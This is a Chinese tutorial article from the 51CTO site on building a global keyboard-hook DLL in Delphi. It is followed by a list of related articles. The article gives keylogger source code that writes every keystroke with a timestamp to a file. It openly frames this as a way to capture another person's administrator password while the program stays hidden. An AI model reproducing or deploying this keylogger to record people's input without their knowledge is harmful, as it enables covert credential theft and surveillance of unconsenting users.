51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

Delphi编程使用HOOK监视Windows

作者:佚名
开发 开发工具
本文是笔者在Delphi学习过程中,得出的个人体会,介绍了通过Delphi编程使用HOOK监视Windows的具体方法,希望能与大家共同分享一下。

  文中详细介绍了如何通过Delphi编程使用HOOK监视Windows的步骤,同时给出了程序实例。

  每个程序都有自己的生存空间,在Windows系统中你可以在任何时候让你的程序执行一些操作,还可以触发消息,触发的消息分为三种,一是操作你程序的界面,onClick,onMouseMove等等,另外一个可以使用Windows的消息机制来捕获一些系统消息,但是如果你想在任何时候监控任何程序的情况那可能你就会选择HOOK来实现了,虽然还有其他方法,但不得不承认,HOOK是一个比较简单解决问题的途径。

  下面就来举个例子:

  如果你需要访问某个人的机器,那在运行\\SB之后那个人就会在你机器上敲入他的adminsitrator密码,当然,你也可以使用黑客工具来得到他的密码,但是,为什么不自己尝试一下写个程序记录所有的键盘操作呢?

  首先需要申明一点,Hook不同于一般的应用程序,需要作为一个全局DLL出现,否则无法在你程序不激活的状态捕获其他信息的,(当然你可以用Windows消息,这个问题不在这里讨论)。

  写个DLL定义一下函数

  1. function setkeyhook:bool;export;  
  2. function endkeyhook:bool;export;  
  3. procedure keyhookexit;far;  
  4. procedure SetMainHandle(Handle: HWND); export;forward;  
  5. function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;  
  6.  
  7. procedure EntryPointProc(Reason: Integer);  
  8.  const 
  9.   hMapObject: THandle = 0;  
  10.  begin  
  11.   case reason of  
  12.    DLL_PROCESS_ATTACH:  
  13.   begin  
  14.    hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), ’_CBT’);  
  15.    rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);  
  16.   end;  
  17.   DLL_PROCESS_DETACH:  
  18.  begin  
  19.  try 
  20.   UnMapViewOfFile(rHookRec);  
  21.   CloseHandle(hMapObject);  
  22.   except  
  23.  end;  
  24. end;  
  25. end;  
  26. end;  
  27. procedure keyhookexit;far;  
  28. begin  
  29. if hNexthookproc<>0 then endkeyhook;  
  30.  exitproc:=procsaveexit;  
  31. end;  
  32. function endkeyhook:bool;export;  
  33. begin  
  34. if hNexthookproc<>0 then  
  35. begin  
  36.  unhookwindowshookex(hNexthookproc);  
  37.  hNexthookproc:=0;  
  38.  messagebeep(0);  
  39. end;  
  40. result:=hNexthookproc=0;  
  41. MainHandle:=0;  
  42. end;  
  43.  
  44. function Setkeyhook:bool;export;  
  45. begin  
  46.  hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0);  
  47.  result:=hNexthookproc<>0;  
  48. end;  
  49. function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;  
  50. var  
  51.  s:Tstringlist;  
  52. begin  
  53.  if icode<0 then  
  54.  begin  
  55.   result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);  
  56.   exit;  
  57.  end;  
  58.  if lparam<0 then  
  59.  begin  
  60.   exit;  
  61.  end;  
  62.  s:=TStringlist.Create;  
  63.  if FileExists(afilename) then  
  64.   s.LoadFromFile(afilename);  
  65.  
  66.   //将敲打的键盘字符保存到文件中   
  67.   s.Add(formatdatetime(’YYYYMMDD hh:nn:ss:zzz: ’,now) + char(wParam) );  
  68.   s.SaveToFile(afilename);  
  69.   s.Free;  
  70.  
  71.   result:=0;  
  72.  end;  

  Dll的Project文件中定义如下

  1. exports  
  2. setkeyhook index 1,  
  3. endkeyhook index 2,  
  4. SetMainHandle index 3;  
  5.  
  6. begin   
  7. hNexthookproc:=0;  
  8. procsaveexit:=exitproc;  
  9. DllProc := @EntryPointProc;  
  10. EntryPointProc(DLL_PROCESS_ATTACH);  
  11. end;

  这样DLL就定义好了,接下来就是画个界面:

  1. function setkeyhook:bool;external ’keyspy.dll’;  
  2. function endkeyhook:bool;external ’keyspy.dll’;  
  3. procedure SetMainHandle(Handle: HWND); external ’keyspy.dll’;  
  4. //开始捕获键盘  
  5. SetMainHandle(handle);  
  6. setkeyhook  
  7. //中止捕获键盘  
  8. endkeyhook    

  然后吧你程序隐蔽起来,启动捕获键盘,在中止捕获之前,所有键盘操作都会被记录到你所定义的filename这个文件名中去,注:这些代码是临时写的,仅是为了说明如何写个hook程序。

  另外Hook的功能不仅仅是简单使用,这就需要靠大家灵活运用了,可以跟很多windows API来配合,通过很多技巧作出让人意想不到的效果。

【编辑推荐】

  1. Delphi基础开发技巧
  2. Delphi编程读取txt文件数据
  3. 如何在Delphi中自动录入数据
  4. 基于Delphi的屏幕抓图技术的实现
  5. Delphi初学者应小心的六大问题
  6. 浅析Delphi XE中的动态Hook某些内部事件
责任编辑:韩亚珊 来源: 编程爱好者
DelphiHOOK
相关推荐
使用 OpsMgr 2007 监视 Windows Server 2008
大家翘首以盼的WindowsServer2008版本对操作系统进行了重大更改,添加了诸如ServerCore、服务器角色、只读DC、HyperV、终端服务网关以及对Internet协议版本6(IPv6)的增强支持等强大功能。

2010-12-16 11:10:29

Windows Ser
浅析Delphi XE中的动态Hook某些内部事件
今天我们讲到的是DelphiXE中的RTTI增强,动态Hook某些内部事件。虽然Delphi有些远离程序员的视线,但是我们应该重视这个曾经的霸主。

2011-01-05 09:14:38

Delphi XE
Windows监视IO性能
在Windows中监视性能基本都用性能监视器了,与IO性能相关的有两个大类,一个是”LogicalDisk”,另外一个是”PhysicalDisk”,”LogicalDisk”更多的是用来监视文件相关的IO性能,而”PhysicalDisk”则是用来监视LUN或者是磁盘卷,下面就列举下与前面所列举的IO性能相关的计数器,具体的自己研究了:

2011-11-08 21:54:05

Windows 监控
使用Nagios监视企业集群
使用Nagios监视企业集群:Nagios与Ganglia一样,常用于HPC和其他环境,但是Nagios更加关注警告机制,Ganglia则更加关注收集和跟踪指标。Nagios以前只是从目标主机收集信息,但最近开发了可以在主机上运行代理的插件。Nagios内置了一个通知系统。

2011-04-06 08:54:25

Nagios监视
使用 Tripwire 监视文件更改
由于现在有一个Tripwirerpm用于AIX,所以我将它用于我们的一些AIX机器。Tripwire并不为基于文件更改的入侵检测提供完整的解决方案,但是若同时运行AIX审计的话,它可以提供坚实的安全策略。根据您在主策略文件中提供的对象,Tripwire监视系统中文件和目录的更改。这些更改可能是(但不限于)改变了以下方面

2012-03-19 10:46:53

ibmdw
Windows Server 2003网络监视监视网络通信
点击WindowsServer2003的“开始”→“程序”→“管理工具”→“网络监视器”(运行网络监视器之前必须确保网络监视器已经安装,在默认情况下网络监视器作为Windows2003的组件没有被安装,需要在“控制面板”的“添加删除Windows组件”中添加“网络监视器”),启动“网络监视器”。

2009-10-26 09:49:26

监视器监视网络通信
Ubuntu mrtg安装内存使用监视
另一个UNIX和Linux主流桌面环境是KDE(K桌面环境,KDesktopEnvironment)。Kubuntu项目为Ubuntu用户提供了一个默认GNOME桌面环境之外的选择。

2010-05-31 19:35:23

Ubuntu mrtg
React 新 Hook:UseFormStatus 使用详解
useFormStatus是结合Action异步请求时使用的Hook,它们是对HTML表单能力的增强。因此我们可以借助他们与HTML表单元素自身支持的特性实现更复杂的表单交互逻辑。

2024-07-16 09:51:39

HTMLHookReact
Delphi编程读取txt文件数据
TXT文本文件是一种以ACSII吗存储数据的文件。在TXT文件中只能够存储一些字符数据,所以这种文件的移植性和通用性很强,具有较高的易用性,并且被广泛应用,所以Delphi对该类型文件提供了较好的支持。本文介绍了Delphi编程读取txt文件数据的方法。

2011-04-06 13:56:36

Delphi
浅析C++程序监视Windows事件日志
想要充分的掌握C++程序监视Windows事件日志的技术,那么就要对C++中的结构、语句、变量、函数、预处理指令、输入和输出等内容进行了解掌握。

2010-01-25 13:31:27

C++程序
如何在Windows 10中设置双监视器或多个监视器?
每个强大的PC用户都知道拥有多个监视器而不是一个监视器的重要性。无论是游戏,图形编辑还是编码Win10中的多显示器设置都可以大大提高工作效率。

2018-12-05 10:10:23

Windows 10设置监视器
Python开发中如何使用Hook技巧
什么是Hook,就是在一个已有的方法上加入一些钩子,使得在该方法执行前或执行后另在做一些额外的处理,那么Hook技巧有什么作用以及我们为什么需要使用它呢?

2017-11-01 07:57:08

Python
Android HOOK工具Cydia Substrate使用详解
CydiaSubstrate是一个代码修改平台。它可以修改任何主进程的代码,不管是用Java还是CC++(native代码)编写的。而Xposed只支持HOOKappprocess中的java函数,因此CydiaSubstrate是一款强大而实用的HOOK工具。

2014-10-13 10:15:13

Android HOOCydia Subst
Delphi编程禁止用户关闭操作系统
本文是笔者在Delphi学习过程中,得出的个人体会,介绍了通过Delphi编程禁止用户关闭操作系统的具体方法,希望能与大家共同分享一下。

2011-04-06 16:07:44

Delphi
C#Windows服务之添加文件监视服务
CWindows服务中添加文件监视服务是如何实现的呢?CWindows服务中添加文件监视服务需要注意什么呢?让我们带着这些问题看一下的文章。

2009-08-14 11:15:19

文件监视C#Windows服务
SQL Server监视内存的正确使用方案
我们今天主要和大家一起分享的是SQLServer监视内存的正确使用方案,以下就是文章的主要内容的详细介绍,望大家会有所收获。

2010-07-07 13:39:33

SQL Server监
使用tshark监视和检查网络流量
大多数人恐怕已经听说过Wireshark,这是一款人气非常旺、功能非常强的网络协议分析工具。但是大家可能不知道的是,还有一个控制台版本的Wireshark,名叫tshark。tshark的两个主要优点就是,它可以用在脚本中,也可以通过SSH连接用在远程计算机上。主要缺点就是,它没有图形用户界面(GUI),如果你要搜索大量的网络数据,要是有GUI,确实方便得很。

2015-09-07 09:41:42

tshark网络流量
Delphi如何使用资源文件
统的Windows程序几乎都至少包含一个对话框和一个图标。但是,Delphi应用程序有所不同。我们就要讲到如何使用资源文件。

2012-02-03 09:55:06

Delphi
Windows管理员:监视Linux扩展文件系统
Windows和Linux使用不同的文件系统架构。幸运的是,您的Windows经验可让您快速习惯Linux扩展文件系统的管理和监视。本文将帮助您了解Linux上的扩展磁盘文件系统家族。

2012-03-09 17:31:50

ibmdw
windows 7资源监视器可用来发现木马
用windows7资源监视器来发现木马……

2009-04-30 01:55:48

windows监视器木马
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服